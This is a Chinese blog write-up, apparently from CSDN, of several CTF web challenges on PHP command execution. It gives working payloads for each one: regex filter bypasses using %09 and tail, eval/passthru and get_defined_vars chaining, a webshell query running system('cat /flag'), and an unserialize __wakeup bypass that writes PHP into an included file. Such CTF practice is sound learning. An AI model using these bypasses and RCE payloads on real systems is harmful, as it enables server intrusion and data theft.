cat 刷题经历(命令执行)

最新推荐文章于 2024-04-21 20:59:12 发布
最新推荐文章于 2024-04-21 20:59:12 发布
阅读量880 收藏
点赞数
文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/125562216
版权

目录

我幽默码

ENV

 命令执行之我在干什么

 命令执行之我是谁

命令执行之我在哪

webshell

 无字符Webshell

目录

我幽默码

ENV

 命令执行之我在干什么

 命令执行之我是谁

命令执行之我在哪

webshell

 无字符Webshell

命令执行

[两小时AK赛] - WEB - easy_unser

我幽默码

打开源码,主页面啥都没有

一个棋盘, 

看#1部分,上面一行是顺序,下面一行是对应棋盘的坐标,比如null对应?,z1对应的字母是o位置是2,以此类推结果是?source,就想到这个应该是给url后面加一个?source但是传什么不清楚,那就随便传个?source=1看看,结果出现了源码,源码如下:

<?php
error_reporting(0);
if(isset($_GET['source'])){
    highlight_file(__FILE__);
    echo "$flag_filename = 'flag'.md5(???).'php';";
    die();
}
if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c'])){
    $c = $_POST['c'];
    $count[++$c] = 1;
    if($count[] = 1) {
        $count[++$c] = 1;
        print_r($count);
        die();
    }else{
        $a = $_POST['a'];
        $b = $_POST['b'];
        echo new $a($b);
    }
}
?>

这时候,感觉唯一可以利用的就是else后面的

$a = $_POST['a'];
        $b = $_POST['b'];
        echo new $a($b);

参考链接:记一道2021浙江省赛的Web题_合天网安实验室的博客-CSDN博客

所以我们就要想办法绕过count=1,因为正常情况肯定是等于,所以想到了溢出问题,这里可以用php数组的溢出,来使得$count[]=1赋值失败。php数组的临界值是9223372036854775807,所以结合代码我们只需要给c传9223372036854775806就可以进入else语句,再结合参考链接里面的我们可以依次post传以下payload拿flag。
———————————

a=DirectoryIterator&b=glob://flag[a-z0-9]*.php&c=9223372036854775806

这个方法可以获得flag的名字,然后接下来就需要读取这个文件

a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag56ea8b83122449e814e0fd7bfb5f220a.php&c=9223372036854775806

 然后解码,就可以获得】

ENV

打开题目显示 ?cat=  但是不是命令执行,

 试了一下发现果然不是然后就,并且没有flag文件结合题目env,想到在PHP中的$_ENV是一个包含服务器端环境变量的数组。它是PHP中一个超级全局变量,我们可以在PHP 程序的任何地方直接访问它。所以就直接var_dump打印一下环境变量看看行不行。传入

?cat=var_dump($_ENV);

然后就得到了flag

 命令执行之我在干什么

<?php
error_reporting(0);
show_source('index.php');
$cmd = $_GET['a'];
$a = '/IFS|flag|cat|tac|more|find|less|[ |<>|?|*|\\\\\'"]/';
if(preg_match($a,$cmd)){
    echo "not allow";
}
else{
    if(strstr($cmd,'yyds')!=$cmd){
        echo "you are success!";
    }
    else{
        system($cmd);
    }
}
?>

第一步先审核代码,发现只有绕过正则匹配,进入else,然后再等于cmd就可以得到system进行命令执行,

strstr()函数,:strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是,则该函数返回str2在str1中首次出现的地址;否则,返回NULL。

比如: 
char str2 = “cdef”; 
char str1 = “abcdefgh”; 
则通过函数,将返回 
strstr(str1,str2) = cdefgh;

 看到传的参数a没有过滤ls命令所以先看目录,传入ls提示you are success!,看代码需要给传入的参数带上yyds,所以传入

?a=yyds;ls 

 

 发现没有flag再看根目录,由于过滤了空格这里用%09绕过payload为

?a=yyds;ls%09/

发现flag文件,下一步读flag

但是代码过滤了linux下常用的看文件命令和关键字flag还有通配符,没有过滤tail,nl等这些看文件命令,用这里用tail读文件,用[a-z]绕过关键字过滤。最终payload为

?a=yyds;tail%09/fla[a-z] 

 

 命令执行之我是谁


<?php 
error_reporting(0);
show_source('index.php');
$cmd = $_GET['cmd'];
$preg = preg_match('/system|exec|shell_exec|`|popen|cat|tac|more|less|flag/',$cmd);
if(!$preg){
    eval($cmd);
}else{
    echo "非法字符";
}
?>

拿到源代码发现过滤根本不严,系统命令执行函数没过滤完,这里我选用passthru()函数实现命令执行。先用

?cmd=passthru("ls");

 

 看到有flag文件之后用

?cmd=passthru("tail%20fl*");

即可拿到flag

命令执行之我在哪

<?php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
    if(!preg_match('/php:\/\/|data:\/\/|phar:\/\/|phpinfo()|info|rm|find|flag|rm|\/|echo|\.|\*|\?/i',$_GET['cmd'])){
        @eval($_GET['cmd']);
    }else{
        echo "danger_string";
    }
}else{
    echo "你啥也不输入,给你个假的flag:flag{error_flag}";
}
?>

这个题是还是命令执行,首先利用GET方式传入cmd参数,代码中过滤了伪协议还有一些关键字,不能以伪协议形式直接读取文件,@eval($_GET['cmd']);将输入的参数以php代码执行。做这个题之前需要知道几个函数,详解如下:

get_defined_vars ( void ) : array 返回由所有已定义变量所组成的数组
此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。

传一下这个函数看一下结果。

payload如下: 

?cmd=var_dump(get_defined_vars());&b=1

 

可以看见b参数在里面,并且GET参数在数组第一个,然后要用current函数提取出来b参数

current ( array &$array ) : mixed 返回数组中的当前单元
每个数组中都有一个内部的指针指向它“当前的”单元,初始指向插入到数组中的第一个单元。 

payload如下:

?cmd=var_dump(current(get_defined_vars()));&b=1 

可以看见我们提取到GET参数的数组了,因为b在最后一个,所以我们用end函数把值取出来。

end ( array &$array ) : mixed end()
将 array 的内部指针移动到最后一个单元并返回其值。 

写下payload:

?cmd=var_dump(end(current(get_defined_vars())));&b=1

  可以看到成功把b参数的值拿出来了。下面配合eval参数可以直接rce。接下来依次用如下payload拿flag

?cmd=eval(end(current(get_defined_vars())));&b=system(%27ls%27);
?cmd=eval(end(current(get_defined_vars())));&b=system(%27tac%20flag.php%27);

就可以获得flag 

webshell

 进入页面,没有任何提示,通常使用robots.txt或www.zip等尝试查看是否存在提示等 ,进行扫目录操作

输入robots.txt果然存在提示webshe11.php

进行访问后发现有一串base64编码,解码后,发现传参的参数是hacker

http://ctf.vfree.ltd:9015/webshe11.php?hacker=system('ls ');

本目录没找到那就看一下根目录,或者一直 ../../../也可以

http://ctf.vfree.ltd:9015/webshe11.php?hacker=system('ls /'); 

 

找到flag,拿下

然后终于知道只有到达flag的目录才可以得到flag 

http://ctf.vfree.ltd:9015/webshe11.php?hacker=system('cat /flag');

 无字符Webshell

这道题有点难度,还在解决ing

命令执行

f发现输入system('ls')没有任何回显,感觉是过滤了然后想到用 反引号执行

?cmd=echo `ls`; 

 发现有个get_flag试着获取一下

没想到如此简单直接出来了

 看别人wp发现确实是简单自己还复杂了,哈哈好傻,但是加油!

[两小时AK赛] - WEB - easy_unser

这道题其实也是命令执行

<?php
//flag in /flag
show_source('./index.php');
class catf1ag{
    public $target='flag';
    function __wakeup(){
        $this->target = "catf1ag is CTF platform!";
    }
    function __destruct(){
        $fp = fopen("catf1ag.php","w");
        fputs($fp,$this->target);
        fclose($fp);
    }
}
$a = $_GET['catf1ag'];
$b = unserialize($a);
include 'catf1ag.php';

?>

进去页面发现源码,然后就发现是构造序列化,绕过wakeup 不然target属性要被赋值

?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:26:"<?php include('/flag'); ?>"}

直接输出flag,或者?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:29:"<?php system(‘cat /flag’); ?>"}

 都可以获得,

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
有限字符下的任意命令执行总结
blue_fantasy的博客
01-10 1571
Text. 因为网上已经有很多大牛写过类似的文章了,所以本篇文章是一个总结梳理学习。 15位可控字符下的命令执行 <?php highlight_file(__FILE__); if(strlen($_GET[1])<15){ echo strlen($_GET[1]); echo shell_exec($_GET[1]); }else{ exit('too long'); } 因为只能传入14个字符,但是没有限制命令执行的次数,所以我们的思想可以通过Linux
【校招】测试开发岗-高频面试题总结
feat_ct的博客
03-09 1万+
写在前面 1. 本文内容来源:本文是将自己在20年里找工作的部分笔记重新整理了下,不少内容当时是查阅的知乎、博客园、书籍等(部分还能找到原帖的均附上了链接)。我自己在这一年里也是从牛客上学习了很多面经和经验帖,收获了好几家大厂offer。最近整理出来这些,希望能对找测开岗的同学们有帮助! 2. 本文内容顺序:测试基础理论、测试岗经常被问到的场景题、Linux知识点、智力题。 3. 本文阅读建议:我结合了自身的面试经历,把高频的、重要的知识点都用★标注了,★越多代表自己被问得次数越多。(当然这也只是我的
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1349
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
preg_match
ylspirit
02-27 399
preg_match 利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。 $string = "football"; if (preg_match('/foo/', $string)) { // 匹配正确
preg_match函数,正则匹配绕过
热门推荐
SsMing的博客
12-27 1万+
以ichunqiu欢乐赛为例子 1.通过.swp 文件恢复出php脚本 vi index.php.swp recover 2.第一关源码为 &lt;?php function areyouok($greeting){    return preg_match('/Merry.*Christmas/is',$greeting); } $greeting=@$_POST['greetin...
命令注入
weixin_51075988的博客
03-14 496
命令执行注入 当应用需要调用一些外部执行程序时(系统的命令 或者是 exe等可执行文件),如果将用户的输入作为系统命令的参数拼接到命令当中,可能存在命令执行漏洞。 条件 1.将用户的输入作为拼接的命令 2.无足够的过滤 危害 相关函数 system() 将 字符串 作为 OS命令执行,并且自带输 出功能 <?php if(isset($_GET['cmd'])){ $str = $_GET['cmd']; system($str); } ?> exec() 将
排查压测问题引发的系统性能调优过程
最新发布
2401_84046816的博客
04-21 924
1、看视频进行系统学习这几年的Crud经历,让我明白自己真的算是菜鸡中的战斗机,也正因为Crud,导致自己技术比较零散,也不够深入不够系统,所以重新进行学习是很有必要的。我差的是系统知识,差的结构框架和思路,所以通过视频来学习,效果更好,也更全面。关于视频学习,个人可以推荐去B站进行学习,B站上有很多学习视频,唯一的缺点就是免费的容易过时。2、读源码,看实战笔记,学习大神思路“编程语言是程序员的表达的方式,而架构是程序员对世界的认知”。所以,程序员要想快速认知并学习架构,读源码是必不可少的。
Java岗校招需要什么水平
youngpeople_的博客
01-14 1441
参加过上一年的秋招,找的java开发岗,拿到过bat等大厂的offer的说下自己的经历。 我之前参加秋招,投递100余家,面试50余场。经历了这么多面试,发现校招Java开发岗并不仅仅看Java水平,还要看算法水平、计算机基础水平。 于是,我根据自己和身边人的经历,将各大厂面试的套路总结了个公式 大厂offer公式:技术栈知识+计算机基础+算法+项目+实习+加分项(竞赛/开源项目/博客)。 这个公式,不仅对Java试用,对cpp、安卓开发,甚至是算法也试用。 其中,以java开发为例,Java技术
从百度三轮面试拿到offer后又到阿里六轮面试,最后留在了阿里
weixin_47345084的博客
07-14 2210
下面整理下从百度三轮面试回来的题目,供你参考! 一,百度一面 1、给一个函数,返回 0 和 1,概率为 p 和 1-p,请你实现一个函数,使得返回 01 概率一样。 2、10 亿个 url,每个 url 大小小于 56B,要求去重,内存 4G。 3、把一个 bst 转化成一个双向链表。 4、http 和 https 区别,https 在请求时额外的过程,https 是如何保证数据安全的; 5、IP 地址子网划分; 6、POST 和 GET 区别; 7、DNS 解析过程; 8、硬连接和软连接区别; 9、kil
2019双非本科秋招总结(结尾附海康深信服面经)
qq_43416810的博客
10-19 1729
以下是我的一些秋招经历,希望可以给你带来收获 先分享下学校的经历,嗯?在校期间成绩一般,没有挂过科,玩点LOL,相信代表绝大多数。日子过得倒是挺滋润,但对奖学金我觉得是个遗憾,理论成绩还行,就是综测懒得加,有没有和我一样的,很反感准备各种文字材料的?没办法学校这些机构就这样一点都不便民。大一凭着预科的经历混了个协会的干事,打打球,再玩了一年游戏。如果你是大一的或者你认识大一的或者将要读大一的,敲重...
【Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 5827
ctf命令执行题型解题方法汇总(持续更新中)
CTFHub-web(RCE)
qq_49502930的博客
12-08 1127
文章目录eval执行文件包含php://input eval执行 打开关卡 意思是判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 我们先在url后输入 ?cmd=system("ls"); 查看根目录 然后输入 ?cmd=system("ls /"); 返回上一级 flag很显眼然后输入 ?cmd=system("cat /文件名"); 得到flag 文件包含 我们打开关卡 有个shell按钮,我们点击 这里使用火狐Hacker插件发现里面有个ctfhub变量,我
php的md5函数漏洞,PHP中MD5函数漏洞
weixin_33347467的博客
03-27 849
题目描述一个网页,不妨设URL为http://haha.com,打开之后是这样的if (isset($_GET['a']) and isset($_GET['b'])) {if ($_GET['a'] != $_GET['b']) {if (md5($_GET['a']) === md5($_GET['b'])) {echo ('Flag: '.$flag);}else {echo 'Wrong....
春秋云镜 CVE-2019-9042
qq_22002773的博客
08-21 194
春秋云镜 CVE-2019-9042
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3532
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
polar CTF 简单rce
samRsa
01-03 687
polar CTF 简单rce 【代码】polar CTF 简单rce。
ctfshow php特性 下
weixin_63231007的博客
06-13 1403
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
[CTF] 关于php代码审计的MD5类的练习
ZXW_NUDT的博客
12-03 2844
练习1 PHP代码: <?php error_reporting(0); highlight_file("pass-01.php"); if(isset($_GET["pass"])){ if($_GET["pass"] != hash("md4", $_GET["pass"])){ die('fail~~~'); }else{ echo "success!!!<br>";
PHP代码审计12—反序列化漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-09 1608
PHP反序列化入门
cat 命令查看 c语言执行程序?
06-09
可以使用`cat`命令来查看C语言程序的源代码,但是要运行C语言程序,需要先将其编译成可执行文件,然后再使用`./`命令执行。具体步骤如下: 1. 编写C语言程序,保存为一个文件,例如`test.c`。 2. 使用`gcc`命令将该文件编译为可执行文件,命令如下: ```bash gcc -o test test.c ``` 这会生成一个名为`test`的可执行文件。 3. 使用`./`命令来运行可执行文件,命令如下: ```bash ./test ``` 这会执行`test`文件并输出相应的结果。如果程序需要输入参数,可以在`./`命令后面加上相应的参数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值